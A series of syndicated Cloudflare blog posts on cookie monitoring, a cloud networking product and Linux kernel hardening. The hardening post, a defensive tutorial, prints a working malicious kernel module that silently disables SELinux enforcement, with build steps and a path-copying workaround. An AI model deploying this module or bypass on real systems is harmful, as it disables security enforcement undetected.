If your website happens to be proxied through Cloudflare already, we will observe one Set-Cookie header (with the cookie name login_id) on the response, while receiving three cookies back: login_id, _ga, and _ga_ABC. Comparing the one cookie that was set with the three that were returned, the overlapping login_id cookie is tagged as set by your website directly. The same principle applies to all requests passing through Cloudflare, allowing us to build an overview of all the first-party cookies used by your websites. A simplified sketch of this comparison logic follows.
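Here is the idea in miniature (illustrative only; the real pipeline works on the Set-Cookie and Cookie headers observed at our proxy):

// Cookies the origin set via Set-Cookie on its responses
const setByOrigin = new Set(['login_id']);

// Cookies the browser returned on a later request
const returned = ['login_id', '_ga', '_ga_ABC'];

// First-party cookies set directly by the website vs. set by external snippets
const setDirectly = returned.filter((name) => setByOrigin.has(name));    // ['login_id']
const setBySnippets = returned.filter((name) => !setByOrigin.has(name)); // ['_ga', '_ga_ABC']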

All cookies in one jar

Inventorying all the cookies set when users visit your websites is a first step toward protecting their privacy, and Page Shield makes this step just one click away. Sign up now to be notified when Page Shield Cookie Monitor becomes available!

1Technically, a first-party cookie is a cookie scoped to the given domain only (so not cross-domain). Such a cookie can also be set for the given domain by a third-party snippet used by the website.

Magic Cloud Networking simplifies security, connectivity, and management of public clouds

Post Syndicated from Steve Welham original https://blog.cloudflare.com/introducing-magic-cloud-networking


Today we are excited to announce Magic Cloud Networking, supercharged by Cloudflare’s recent acquisition of Nefeli Networks’ innovative technology. These new capabilities to visualize and automate cloud networks will give our customers secure, easy, and seamless connection to public cloud environments.

Public clouds offer organizations a scalable and on-demand IT infrastructure without the overhead and expense of running their own datacenter. Cloud networking is foundational to applications that have been migrated to the cloud, but is difficult to manage without automation software, especially when operating at scale across multiple cloud accounts. Magic Cloud Networking uses familiar concepts to provide a single interface that controls and unifies multiple cloud providers’ native network capabilities to create reliable, cost-effective, and secure cloud networks.

Nefeli’s approach to multi-cloud networking solves the problem of building and operating end-to-end networks within and across public clouds, allowing organizations to securely leverage applications spanning any combination of internal and external resources. Adding Nefeli’s technology will make it easier than ever for our customers to connect and protect their users, private networks and applications.

Why is cloud networking difficult?

Compared with a traditional on-premises data center network, cloud networking promises simplicity:

  • Much of the complexity of physical networking is abstracted away from users because the physical and ethernet layers are not part of the network service exposed by the cloud provider.
  • There are fewer control plane protocols; instead, the cloud providers deliver a simplified software-defined network (SDN) that is fully programmable via API.
  • There is capacity — from zero up to very large — available instantly and on-demand, only charging for what you use.

However, that promise has not yet been fully realized. Our customers have described several reasons cloud networking is difficult:

  • Poor end-to-end visibility: Cloud network visibility tools are difficult to use and silos exist even within single cloud providers that impede end-to-end monitoring and troubleshooting.
  • Faster pace: Traditional IT management approaches clash with the promise of the cloud: instant deployment available on-demand. Familiar ClickOps and CLI-driven procedures must be replaced by automation to meet the needs of the business.
  • Different technology: Established network architectures in on-premises environments do not seamlessly transition to a public cloud. The missing ethernet layer and advanced control plane protocols were critical in many network designs.
  • New cost models: The dynamic pay-as-you-go usage-based cost models of the public clouds are not compatible with established approaches built around fixed cost circuits and 5-year depreciation. Network solutions are often architected with financial constraints, and accordingly, different architectural approaches are sensible in the cloud.
  • New security risks: Securing public clouds with true zero trust and least-privilege demands mature operating processes and automation, and familiarity with cloud-specific policies and IAM controls.
  • Multi-vendor: Oftentimes enterprise networks have used single-vendor sourcing to facilitate interoperability, operational efficiency, and targeted hiring and training. Operating a network that extends beyond a single cloud, into other clouds or on-premises environments, is a multi-vendor scenario.

Nefeli considered all these problems and the tensions between different customer perspectives to identify where the problem should be solved.

Trains, planes, and automation

Consider a train system. To operate effectively it has three key layers:

  • tracks and trains
  • electronic signals
  • a company to manage the system and sell tickets.

A train system with good tracks, trains, and signals could still be operating below its full potential because its agents are unable to keep up with passenger demand. The result is that passengers cannot plan itineraries or purchase tickets.

The train company eliminates bottlenecks in process flow by simplifying the schedules, simplifying the pricing, providing agents with better booking systems, and installing automated ticket machines. Now the same fast and reliable infrastructure of tracks, trains, and signals can be used to its full potential.

Solve the right problem

In networking, there are an analogous set of three layers, called the networking planes:

  • Data Plane: the network paths that transport data (in the form of packets) from source to destination.
  • Control Plane: protocols and logic that change how packets are steered across the data plane.
  • Management Plane: the configuration and monitoring interfaces for the data plane and control plane.

In public cloud networks, these layers map to:

  • Cloud Data Plane: The underlying cables and devices are exposed to users as the Virtual Private Cloud (VPC) or Virtual Network (VNet) service that includes subnets, routing tables, security groups/ACLs and additional services such as load-balancers and VPN gateways.
  • Cloud Control Plane: In place of distributed protocols, the cloud control plane is a software defined network (SDN) that, for example, programs static route tables. (There is limited use of traditional control plane protocols, such as BGP to interface with external networks and ARP to interface with VMs.)
  • Cloud Management Plane: An administrative interface with a UI and API which allows the admin to fully configure the data and control planes. It also provides a variety of monitoring and logging capabilities that can be enabled and integrated with 3rd party systems.

Like our train example, most of the problems that our customers experience with cloud networking are in the third layer: the management plane.

Nefeli simplifies, unifies, and automates cloud network management and operations.

Avoid cost and complexity

One common approach to tackle management problems in cloud networks is introducing Virtual Network Functions (VNFs), which are virtual machines (VMs) that do packet forwarding, in place of native cloud data plane constructs. Some VNFs are routers, firewalls, or load-balancers ported from a traditional network vendor’s hardware appliances, while others are software-based proxies often built on open-source projects like NGINX or Envoy. Because VNFs mimic their physical counterparts, IT teams could continue using familiar management tooling, but VNFs have downsides:

  • VMs do not have custom network silicon and so instead rely on raw compute power. The VM is sized for the peak anticipated load and then typically runs 24x7x365. This drives a high cost of compute regardless of the actual utilization.
  • High-availability (HA) relies on fragile, costly, and complex network configuration.
  • Service insertion — the configuration to put a VNF into the packet flow — often forces packet paths that incur additional bandwidth charges.
  • VNFs are typically licensed similarly to their on-premises counterparts and are expensive.
  • VNFs lock in the enterprise and potentially exclude it from benefiting from improvements in the cloud’s native data plane offerings.

For these reasons, enterprises are turning away from VNF-based solutions and increasingly looking to rely on the native network capabilities of their cloud service providers. The built-in public cloud networking is elastic, performant, robust, and priced on usage, with high-availability options integrated and backed by the cloud provider’s service level agreement.

In our train example, the tracks and trains are good. Likewise, the cloud network data plane is highly capable. Changing the data plane to solve management plane problems is the wrong approach. To make this work at scale, organizations need a solution that works together with the native network capabilities of cloud service providers.

Nefeli leverages native cloud data plane constructs rather than third party VNFs.

Introducing Magic Cloud Networking

The Nefeli team has joined Cloudflare to integrate cloud network management functionality with Cloudflare One. This capability is called Magic Cloud Networking and with it, enterprises can use the Cloudflare dashboard and API to manage their public cloud networks and connect with Cloudflare One.

End-to-end

Just as train providers are focused only on completing train journeys in their own network, cloud service providers deliver network connectivity and tools within a single cloud account. Many large enterprises have hundreds of cloud accounts across multiple cloud providers. In an end-to-end network this creates disconnected networking silos which introduce operational inefficiencies and risk.

Imagine you are trying to organize a train journey across Europe, and no single train company serves both your origin and destination. You know they all offer the same basic service: a seat on a train. However, your trip is difficult to arrange because it involves multiple trains operated by different companies with their own schedules and ticketing rates, all in different languages!

Magic Cloud Networking is like an online travel agent that aggregates multiple transportation options, books multiple tickets, facilitates changes after booking, and then delivers travel status updates.

Through the Cloudflare dashboard, you can discover all of your network resources across accounts and cloud providers and visualize your end-to-end network in a single interface. Once Magic Cloud Networking discovers your networks, you can build a scalable network through a fully automated and simple workflow.

Resource inventory shows all configuration in a single and responsive UI

Taming per-cloud complexity

Public clouds are used to deliver applications and services. Each cloud provider offers a composable stack of modular building blocks (resources) that start with the foundation of a billing account and then add on security controls. The next foundational layer, for server-based applications, is VPC networking. Additional resources are built on the VPC network foundation until you have compute, storage, and network infrastructure to host the enterprise application and data. Even relatively simple architectures can be composed of hundreds of resources.

The trouble is, these resources expose abstractions that are different from the building blocks you would use to build a service on-prem; the abstractions differ between cloud providers; and they form a web of dependencies with complex rules about how configuration changes are made (rules which differ between resource types and cloud providers). For example, say I create 100 VMs and connect them to an IP network. Can I make changes to the IP network while the VMs are using it? The answer: it depends.
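To make that concrete, here is how you would simply list routes in three major clouds. The CLI commands are real, but the point is that each management plane has its own vocabulary and output shape (configured credentials and installed CLIs are assumed):

# The same question ("what routes exist in my network?") has three spellings:
aws ec2 describe-route-tables --region us-east-1   # AWS VPC route tables
gcloud compute routes list                         # Google Cloud routes
az network route-table list --output table         # Azure route tables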

Magic Cloud Networking handles these differences and complexities for you. It configures native cloud constructs such as VPN gateways, routes, and security groups to securely connect your cloud VPC network to Cloudflare One without having to learn each cloud’s incantations for creating VPN connections and hubs.

Continuous, coordinated automation

Returning to our train system example, what if the railway maintenance staff find a dangerous fault on the railroad track? They manually set the signal to a stop light to prevent any oncoming trains using the faulty section of track. Then, what if, by unfortunate coincidence, the scheduling office is changing the signal schedule, and they set the signals remotely which clears the safety measure made by the maintenance crew? Now there is a problem that no one knows about and the root cause is that multiple authorities can change the signals via different interfaces without coordination.

The same problem exists in cloud networks: configuration changes are made by different teams using different automation and configuration interfaces across a spectrum of roles such as billing, support, security, networking, firewalls, database, and application development.

Once your network is deployed, Magic Cloud Networking monitors its configuration and health, enabling you to be confident that the security and connectivity you put in place yesterday is still in place today. It tracks the cloud resources it is responsible for, automatically reverting drift if they are changed out-of-band, while allowing you to manage other resources, like storage buckets and application servers, with other automation tools. And, as you change your network, Cloudflare takes care of route management, injecting and withdrawing routes globally across Cloudflare and all connected cloud provider networks.

Magic Cloud Networking is fully programmable via API, and can be integrated into existing automation toolchains.
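As a purely hypothetical sketch of such an integration, the call below follows standard Cloudflare v4 API conventions, but the resource path is a placeholder rather than a documented endpoint; consult the product documentation for the real API:

# Hypothetical: poll cloud network state from an automation pipeline.
# The "/magic/cloud/..." path is a placeholder, not a documented endpoint.
curl -s \
  -H "Authorization: Bearer $CLOUDFLARE_API_TOKEN" \
  "https://api.cloudflare.com/client/v4/accounts/$ACCOUNT_ID/magic/cloud/..." | jq .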

The interface warns when cloud network infrastructure drifts from intent

Ready to start conquering cloud networking?

We are thrilled to introduce Magic Cloud Networking as another pivotal step to fulfilling the promise of the Connectivity Cloud. This marks our initial stride in empowering customers to seamlessly integrate Cloudflare with their public clouds to get securely connected, stay securely connected, and gain flexibility and cost savings as they go.

Join us on this journey for early access: learn more and sign up here.

Linux kernel security tunables everyone should consider adopting

Post Syndicated from Ignat Korchagin original https://blog.cloudflare.com/linux-kernel-hardening

The Linux kernel is the heart of many modern production systems. It decides when any code is allowed to run and which programs/users can access which resources. It manages memory, mediates access to hardware, and does the bulk of the work under the hood on behalf of programs running on top. Since the kernel is always involved in any code execution, it is in the best position to protect the system from malicious programs, enforce the desired system security policy, and provide security features for safer production environments.

In this post, we will review some Linux kernel security configurations we use at Cloudflare and how they help to block or minimize a potential system compromise.

Secure boot

When a machine (either a laptop or a server) boots, it goes through several boot stages:

Within a secure boot architecture each stage from the above diagram verifies the integrity of the next stage before passing execution to it, thus forming a so-called secure boot chain. This way “trustworthiness” is extended to every component in the boot chain, because if we verified the code integrity of a particular stage, we can trust this code to verify the integrity of the next stage.

We have previously covered how Cloudflare implements secure boot in the initial stages of the boot process. In this post, we will focus on the Linux kernel.

Secure boot is the cornerstone of any operating system security mechanism. The Linux kernel is the primary enforcer of the operating system security configuration and policy, so we have to be sure that the Linux kernel itself has not been tampered with. In our previous post about secure boot we showed how we use UEFI Secure Boot to ensure the integrity of the Linux kernel.

But what happens next? After the kernel gets executed, it may try to load additional drivers, or as they are called in the Linux world, kernel modules. And kernel module loading is not confined just to the boot process. A module can be loaded at any time during runtime: when a new device is plugged in and a driver is needed, when additional extensions in the networking stack are required (for example, for fine-grained firewall rules), or manually by the system administrator.

However, uncontrolled kernel module loading might pose a significant risk to system integrity. Unlike regular programs, which get executed as user space processes, kernel modules are pieces of code which get injected and executed directly in the Linux kernel address space. There is no separation between the code and data of different kernel modules and core kernel subsystems, so everything can access everything. This means that a rogue kernel module can completely nullify the trustworthiness of the operating system and make secure boot useless. As an example, consider a simple Debian 12 (Bookworm) installation, but with SELinux configured and enforcing:

ignat@dev:~$ lsb_release --all
No LSB modules are available.
Distributor ID:	Debian
Description:	Debian GNU/Linux 12 (bookworm)
Release:	12
Codename:	bookworm
ignat@dev:~$ uname -a
Linux dev 6.1.0-18-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
ignat@dev:~$ sudo getenforce
Enforcing

Now we need to do some research. First, we see that we’re running the 6.1.76 Linux kernel. Exploring the source code shows that, inside the kernel, the SELinux configuration is stored in a singleton structure, which is defined as follows:

struct selinux_state {
#ifdef CONFIG_SECURITY_SELINUX_DISABLE
	bool disabled;
#endif
#ifdef CONFIG_SECURITY_SELINUX_DEVELOP
	bool enforcing;
#endif
	bool checkreqprot;
	bool initialized;
	bool policycap[__POLICYDB_CAP_MAX];

	struct page *status_page;
	struct mutex status_lock;

	struct selinux_avc *avc;
	struct selinux_policy __rcu *policy;
	struct mutex policy_mutex;
} __randomize_layout;

From the above, we can see that if the kernel configuration has CONFIG_SECURITY_SELINUX_DEVELOP enabled, the structure would have a boolean variable enforcing, which controls the enforcement status of SELinux at runtime. This is exactly what the above $ sudo getenforce command returns. We can double check that the Debian kernel indeed has the configuration option enabled:

ignat@dev:~$ grep CONFIG_SECURITY_SELINUX_DEVELOP /boot/config-`uname -r`
CONFIG_SECURITY_SELINUX_DEVELOP=y

Good! Now that we have a variable in the kernel which is responsible for some security enforcement, we can try to attack it. One problem though is the __randomize_layout attribute: since CONFIG_SECURITY_SELINUX_DISABLE is actually not set for our Debian kernel, normally enforcing would be the first member of the struct. Thus, if we know where the struct is, we immediately know the position of the enforcing flag. With __randomize_layout, during kernel compilation the compiler might place members at arbitrary positions within the struct, making it harder to create generic exploits. But arbitrary struct randomization within the kernel may introduce a performance impact, so it is often disabled, and it is disabled for the Debian kernel:

ignat@dev:~$ grep RANDSTRUCT /boot/config-`uname -r`
CONFIG_RANDSTRUCT_NONE=y

We can also confirm the compiled position of the enforcing flag using the pahole tool and either kernel debug symbols, if available, or (on modern kernels, if enabled) in-kernel BTF information. We will use the latter:

ignat@dev:~$ pahole -C selinux_state /sys/kernel/btf/vmlinux
struct selinux_state {
	bool                       enforcing;            /*     0     1 */
	bool                       checkreqprot;         /*     1     1 */
	bool                       initialized;          /*     2     1 */
	bool                       policycap[8];         /*     3     8 */

	/* XXX 5 bytes hole, try to pack */

	struct page *              status_page;          /*    16     8 */
	struct mutex               status_lock;          /*    24    32 */
	struct selinux_avc *       avc;                  /*    56     8 */
	/* --- cacheline 1 boundary (64 bytes) --- */
	struct selinux_policy *    policy;               /*    64     8 */
	struct mutex               policy_mutex;         /*    72    32 */

	/* size: 104, cachelines: 2, members: 9 */
	/* sum members: 99, holes: 1, sum holes: 5 */
	/* last cacheline: 40 bytes */
};

So enforcing is indeed located at the start of the structure and we don’t even have to be a privileged user to confirm this.

Great! All we need is the runtime address of the selinux_state variable inside the kernel:

ignat@dev:~$ sudo grep selinux_state /proc/kallsyms
ffffffffbc3bcae0 B selinux_state

With all this information, we can write an almost textbook-simple kernel module to manipulate the SELinux state:

mymod.c:

#include <linux/module.h>

static int __init mod_init(void)
{
	/* Hardcoded runtime address of selinux_state from /proc/kallsyms above */
	bool *selinux_enforce = (bool *)0xffffffffbc3bcae0;
	/* enforcing is the first member of the struct, so clearing the first
	 * byte silently switches SELinux into permissive mode */
	*selinux_enforce = false;
	return 0;
}

static void mod_fini(void)
{
}

module_init(mod_init);
module_exit(mod_fini);

MODULE_DESCRIPTION("A somewhat malicious module");
MODULE_AUTHOR("Ignat Korchagin <[email protected]>");
MODULE_LICENSE("GPL");

And the respective Kbuild file:

obj-m := mymod.o

With these two files we can build a full-fledged kernel module according to the official kernel docs:

ignat@dev:~$ cd mymod/
ignat@dev:~/mymod$ ls
Kbuild  mymod.c
ignat@dev:~/mymod$ make -C /lib/modules/`uname -r`/build M=$PWD
make: Entering directory '/usr/src/linux-headers-6.1.0-18-cloud-amd64'
  CC [M]  /home/ignat/mymod/mymod.o
  MODPOST /home/ignat/mymod/Module.symvers
  CC [M]  /home/ignat/mymod/mymod.mod.o
  LD [M]  /home/ignat/mymod/mymod.ko
  BTF [M] /home/ignat/mymod/mymod.ko
Skipping BTF generation for /home/ignat/mymod/mymod.ko due to unavailability of vmlinux
make: Leaving directory '/usr/src/linux-headers-6.1.0-18-cloud-amd64'

If we try to load this module now, the system may not allow it due to the SELinux policy:

ignat@dev:~/mymod$ sudo insmod mymod.ko
insmod: ERROR: could not load module mymod.ko: Permission denied

We can work around it by copying the module into the standard module path:

ignat@dev:~/mymod$ sudo cp mymod.ko /lib/modules/`uname -r`/kernel/crypto/

Now let’s try it out:

ignat@dev:~/mymod$ sudo getenforce
Enforcing
ignat@dev:~/mymod$ sudo insmod /lib/modules/`uname -r`/kernel/crypto/mymod.ko
ignat@dev:~/mymod$ sudo getenforce
Permissive

Not only did we disable the SELinux protection via a malicious kernel module, we did it quietly. Normal sudo setenforce 0, even if allowed, would go through the official selinuxfs interface and would emit an audit message. Our code manipulated the kernel memory directly, so no one was alerted. This illustrates why uncontrolled kernel module loading is very dangerous and that is why most security standards and commercial security monitoring products advocate for close monitoring of kernel module loading.
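For contrast, here is a sketch of the audited path, assuming auditd is installed and running; toggling enforcement through the official selinuxfs interface leaves a MAC_STATUS record in the audit log:

# The sanctioned toggle goes through /sys/fs/selinux and is recorded
# by the kernel audit subsystem:
sudo setenforce 0
sudo ausearch -m MAC_STATUS -ts recent   # shows the enforcing=0 audit event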

But we don’t need to monitor kernel modules at Cloudflare. Let’s repeat the exercise on a Cloudflare production kernel (module recompilation skipped for brevity):

ignat@dev:~/mymod$ uname -a
Linux dev 6.6.17-cloudflare-2024.2.9 #1 SMP PREEMPT_DYNAMIC Mon Sep 27 00:00:00 UTC 2010 x86_64 GNU/Linux
ignat@dev:~/mymod$ sudo insmod /lib/modules/`uname -r`/kernel/crypto/mymod.ko
insmod: ERROR: could not insert module /lib/modules/6.6.17-cloudflare-2024.2.9/kernel/crypto/mymod.ko: Key was rejected by service

We get a Key was rejected by service error when trying to load a module, and the kernel log will have the following message:

ignat@dev:~/mymod$ sudo dmesg | tail -n 1
[41515.037031] Loading of unsigned module is rejected

This is because the Cloudflare kernel requires all the kernel modules to have a valid signature, so we don’t even have to worry about a malicious module being loaded at some point:

ignat@dev:~$ grep MODULE_SIG_FORCE /boot/config-`uname -r`
CONFIG_MODULE_SIG_FORCE=y

For completeness, it is worth noting that the Debian stock kernel also supports module signatures, but does not enforce them:

ignat@dev:~$ grep MODULE_SIG /boot/config-6.1.0-18-cloud-amd64
CONFIG_MODULE_SIG_FORMAT=y
CONFIG_MODULE_SIG=y
# CONFIG_MODULE_SIG_FORCE is not set
…

The above configuration means that the kernel will validate a module signature if one is available. If a signature is missing, the module will be loaded anyway, a warning message will be emitted, and the kernel will be tainted.
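A quick way to observe this behavior is to check the kernel taint flags after loading an unsigned module. This is a sketch for such a permissive kernel; the exact taint value depends on whatever else has already tainted the kernel:

# On a kernel with CONFIG_MODULE_SIG=y but CONFIG_MODULE_SIG_FORCE unset,
# an unsigned module loads with a warning and taints the kernel:
sudo insmod mymod.ko
sudo dmesg | grep -i 'module verification failed'
cat /proc/sys/kernel/tainted   # bit 13 (value 8192) marks an unsigned module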

Key management for kernel module signing

Signed kernel modules are great, but it creates a key management problem: to sign a module we need a signing keypair that is trusted by the kernel. The public key of the keypair is usually directly embedded into the kernel binary, so the kernel can easily use it to verify module signatures. The private key of the pair needs to be protected and secure, because if it is leaked, anyone could compile and sign a potentially malicious kernel module which would be accepted by our kernel.

But what is the best way to eliminate the risk of losing something? Not to have it in the first place! Luckily the kernel build system will generate a random keypair for module signing, if none is provided. At Cloudflare, we use that feature to sign all the kernel modules during the kernel compilation stage. When the compilation and signing is done though, instead of storing the key in a secure place, we just destroy the private key:

So with the above process:

  1. The kernel build system generates a random keypair, then compiles the kernel and modules
  2. The public key is embedded into the kernel image; the private key is used to sign all the modules
  3. The private key is destroyed (a minimal sketch of this flow is shown below)
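A minimal sketch of this build-and-destroy flow, assuming an upstream kernel source tree and the default generated key location (certs/signing_key.pem), could look like this:

# Enable module signing; the build generates an ephemeral keypair if none exists.
./scripts/config --enable MODULE_SIG --enable MODULE_SIG_ALL --enable MODULE_SIG_FORCE
make olddefconfig
make -j"$(nproc)" bzImage modules                    # creates certs/signing_key.pem if absent
make modules_install INSTALL_MOD_PATH=/tmp/staging   # modules are signed at install time
shred -u certs/signing_key.pem                       # destroy the private key once signing is done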

With this scheme not only do we not have to worry about module signing key management, we also use a different key for each kernel we release to production. So even if a particular build process is hijacked and the signing key is not destroyed and potentially leaked, the key will no longer be valid when a kernel update is released.

There are some flexibility downsides though, as we can’t “retrofit” a new kernel module for an already released kernel (for example, for a new piece of hardware we are adopting). However, it is not a practical limitation for us as we release kernels often (roughly every week) to keep up with a steady stream of bug fixes and vulnerability patches in the Linux Kernel.

KEXEC

KEXEC (or kexec_load()) is an interesting system call in Linux, which allows one kernel to directly execute (or jump to) another kernel. The idea behind this is to switch/update/downgrade kernels faster, without going through a full reboot cycle, to minimize potential system downtime. However, it was developed quite a while ago, when secure boot and system integrity were not yet major concerns. Therefore, its original design has security flaws and is known to be able to bypass secure boot and potentially compromise system integrity.

We can see the problems just based on the definition of the system call itself:

struct kexec_segment {
	const void *buf;
	size_t bufsz;
	const void *mem;
	size_t memsz;
};
...
long kexec_load(unsigned long entry, unsigned long nr_segments, struct kexec_segment *segments, unsigned long flags);

So the kernel expects just a collection of buffers with code to execute. Back in those days there was not much desire to do a lot of data parsing inside the kernel, so the idea was to parse the to-be-executed kernel image in user space and provide the kernel with only the data it needs. Also, to switch kernels live, we need an intermediate program which would take over while the old kernel is shutting down and the new kernel has not yet been executed. In the kexec world this program is called purgatory. Thus the problem is evident: we give the kernel a bunch of code and it will happily execute it at the highest privilege level. But instead of the original kernel or purgatory code, we can easily provide code similar to the one demonstrated earlier in this post, which disables SELinux (or does something else to the kernel).

At Cloudflare we have had kexec_load() disabled for some time now because of this. The advantage of faster reboots with kexec comes with a (small) risk of improperly initialized hardware, so it was not worth using even without the security concerns. However, kexec does provide one useful feature: it is the foundation of the Linux kernel crashdumping solution. In a nutshell, if a kernel crashes in production (due to a bug or some other error), a backup kernel (previously loaded with kexec) can take over, then collect and save the memory dump for further investigation. This allows us to investigate kernel and other issues in production more effectively, so it is a powerful tool to have.

Luckily, since the original problems with kexec were outlined, Linux has developed an alternative, secure interface for kexec: instead of buffers with code, it expects file descriptors for the to-be-executed kernel image and initrd, and does the parsing inside the kernel. Thus, only a valid kernel image can be supplied. On top of this, we can configure kexec to require that the provided images are properly signed, so only authorized code can be executed in the kexec scenario. A secure configuration for kexec looks something like this:

ignat@dev:~$ grep KEXEC /boot/config-`uname -r`
CONFIG_KEXEC_CORE=y
CONFIG_HAVE_IMA_KEXEC=y
# CONFIG_KEXEC is not set
CONFIG_KEXEC_FILE=y
CONFIG_KEXEC_SIG=y
CONFIG_KEXEC_SIG_FORCE=y
CONFIG_KEXEC_BZIMAGE_VERIFY_SIG=y
…

Above we ensure that the legacy kexec_load() system call is disabled by disabling CONFIG_KEXEC, but still can configure Linux Kernel crashdumping via the new kexec_file_load() system call via CONFIG_KEXEC_FILE=y with enforced signature checks (CONFIG_KEXEC_SIG=y and CONFIG_KEXEC_SIG_FORCE=y).
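With this configuration in place, a crashdump or replacement kernel is loaded through the file-based interface. Here is a sketch using kexec-tools, whose -s flag selects the kexec_file_load() system call:

# Load a kernel via kexec_file_load(); with CONFIG_KEXEC_SIG_FORCE=y the
# kernel verifies the image signature before accepting it:
sudo kexec -s -l /boot/vmlinuz-"$(uname -r)" \
    --initrd=/boot/initrd.img-"$(uname -r)" --reuse-cmdline
# An unsigned or tampered image is rejected at load time.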

Note that the stock Debian kernel has the legacy kexec_load() system call enabled and does not enforce signature checks for kexec_file_load() (similar to module signature checks):

ignat@dev:~$ grep KEXEC /boot/config-6.1.0-18-cloud-amd64
CONFIG_KEXEC=y
CONFIG_KEXEC_FILE=y
CONFIG_ARCH_HAS_KEXEC_PURGATORY=y
CONFIG_KEXEC_SIG=y
# CONFIG_KEXEC_SIG_FORCE is not set
CONFIG_KEXEC_BZIMAGE_VERIFY_SIG=y
…

Kernel Address Space Layout Randomization (KASLR)

Even on the stock Debian kernel, if you try to repeat the exercise we described in the “Secure boot” section of this post after a system reboot, you will likely find that it now fails to disable SELinux. This is because we hardcoded the kernel address of the selinux_state structure in our malicious kernel module, but the address has changed:

ignat@dev:~$ sudo grep selinux_state /proc/kallsyms
ffffffffb41bcae0 B selinux_state

Kernel Address Space Layout Randomization (or KASLR) is a simple concept: it slightly and randomly shifts the kernel code and data on each boot:

This is to combat targeted exploitation (like the malicious module in this post) based on knowledge of the location of internal kernel structures and code. It is especially useful for popular Linux distribution kernels, like the Debian one, because most users run the same binary and anyone can download the debug symbols and the System.map file with all the addresses of the kernel internals. Note that KASLR will not prevent the module from loading and doing harm, but it will likely not achieve the targeted effect of disabling SELinux. Instead, it will modify a random piece of kernel memory, potentially causing the kernel to crash.

Both the Cloudflare kernel and the Debian one have this feature enabled:

ignat@dev:~$ grep RANDOMIZE_BASE /boot/config-`uname -r`
CONFIG_RANDOMIZE_BASE=y

Restricted kernel pointers

While KASLR helps against targeted exploits, it is quite easy to bypass, since everything is shifted by a single random offset, as shown in the diagram above. Thus, if the attacker learns at least one runtime kernel address, they can recover this offset by subtracting the symbol’s compile-time address (taken from the kernel’s System.map file) from its runtime address. Once they know the offset, they can recover the addresses of all other symbols by adjusting them by this offset.
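For example, here is a sketch of recovering the offset from a single leaked symbol, assuming the distribution ships a System.map for the running kernel:

# One leaked runtime address is enough to de-randomize the whole kernel:
runtime=$(sudo grep ' B selinux_state' /proc/kallsyms | awk '{print $1}')
static=$(sudo grep ' B selinux_state' /boot/System.map-"$(uname -r)" | awk '{print $1}')
printf 'KASLR offset: 0x%x\n' $(( 0x$runtime - 0x$static ))
# Adding this offset to any System.map address yields its runtime location.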

Therefore, modern kernels take precautions not to leak kernel addresses at least to unprivileged users. One of the main tunables for this is the kptr_restrict sysctl. It is a good idea to set it at least to 1 to not allow regular users to see kernel pointers:

ignat@dev:~$ sudo sysctl -w kernel.kptr_restrict=1
kernel.kptr_restrict = 1
ignat@dev:~$ grep selinux_state /proc/kallsyms
0000000000000000 B selinux_state

Privileged users can still see the pointers:

ignat@dev:~$ sudo grep selinux_state /proc/kallsyms
ffffffffb41bcae0 B selinux_state
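To make the setting persistent across reboots, the usual approach is a drop-in file under /etc/sysctl.d (the file name below is arbitrary):

# Persist kptr_restrict across reboots:
echo 'kernel.kptr_restrict = 1' | sudo tee /etc/sysctl.d/99-hardening.conf
sudo sysctl --system   # reload all sysctl configuration files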

Similar to the kptr_restrict sysctl, there is also dmesg_restrict, which, if set, prevents regular users from reading the kernel log (which may also leak kernel pointers via its messages). While you need to explicitly set the kptr_restrict sysctl to a non-zero value on each boot (or persist it with the drop-in approach shown above), you can configure the initial value of dmesg_restrict via the CONFIG_SECURITY_DMESG_RESTRICT kernel configuration option. Both the Cloudflare kernel and the Debian one enforce dmesg_restrict this way:

ignat@dev:~$ grep CONFIG_SECURITY_DMESG_RESTRICT /boot/config-`uname -r`
CONFIG_SECURITY_DMESG_RESTRICT=y

It is worth noting that /proc/kallsyms and the kernel log are not the only sources of potential kernel pointer leaks. There is a lot of legacy in the Linux kernel, and new leak sources are continuously being found and patched. That’s why it is very important to stay up to date with the latest kernel bugfix releases.

Lockdown LSM

Linux Security Modules (LSM) is a hook-based framework for implementing security policies and Mandatory Access Control in the Linux Kernel. We have covered our usage of another LSM, BPF-LSM, previously.

BPF-LSM is a useful foundational piece for our kernel security, but in this post we want to mention another useful LSM module we use — the Lockdown LSM. Lockdown can be in three states (controlled by the /sys/kernel/security/lockdown special file):

ignat@dev:~$ cat /sys/kernel/security/lockdown
[none] integrity confidentiality

none is the state where nothing is enforced and the module is effectively disabled. When Lockdown is in the integrity state, the kernel tries to prevent any operation, which may compromise its integrity. We already covered some examples of these in this post: loading unsigned modules and executing unsigned code via KEXEC. But there are other potential ways (which are mentioned in the LSM’s man page), all of which this LSM tries to block. confidentiality is the most restrictive mode, where Lockdown will also try to prevent any information leakage from the kernel. In practice this may be too restrictive for server workloads as it blocks all runtime debugging capabilities, like perf or eBPF.

Let’s see the Lockdown LSM in action. On a barebones Debian system the initial state is none meaning nothing is locked down:

ignat@dev:~$ uname -a
Linux dev 6.1.0-18-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
ignat@dev:~$ cat /sys/kernel/security/lockdown
[none] integrity confidentiality

We can switch the system into the integrity mode:

ignat@dev:~$ echo integrity | sudo tee /sys/kernel/security/lockdown
integrity
ignat@dev:~$ cat /sys/kernel/security/lockdown
none [integrity] confidentiality

It is worth noting that we can only put the system into a more restrictive state, but not back. That is, once in integrity mode we can only switch to confidentiality mode, but not back to none:

ignat@dev:~$ echo none | sudo tee /sys/kernel/security/lockdown
none
tee: /sys/kernel/security/lockdown: Operation not permitted

Now we can see that even on a stock Debian kernel, which as we discovered above, does not enforce module signatures by default, we cannot load a potentially malicious unsigned kernel module anymore:

ignat@dev:~$ sudo insmod mymod/mymod.ko
insmod: ERROR: could not insert module mymod/mymod.ko: Operation not permitted

And the kernel log will helpfully point out that this is due to Lockdown LSM:

ignat@dev:~$ sudo dmesg | tail -n 1
[21728.820129] Lockdown: insmod: unsigned module loading is restricted; see man kernel_lockdown.7

As we can see, Lockdown LSM helps to tighten the security of a kernel, which otherwise may not have other enforcing bits enabled, like the stock Debian one.
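You can also set the initial Lockdown state on a stock kernel without recompiling, via the lockdown= kernel command-line parameter. A sketch for a Debian system booting with GRUB:

# In /etc/default/grub, append the desired mode to the kernel command line:
#   GRUB_CMDLINE_LINUX="... lockdown=integrity"
sudo update-grub && sudo reboot
# After reboot: cat /sys/kernel/security/lockdown
#   none [integrity] confidentiality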

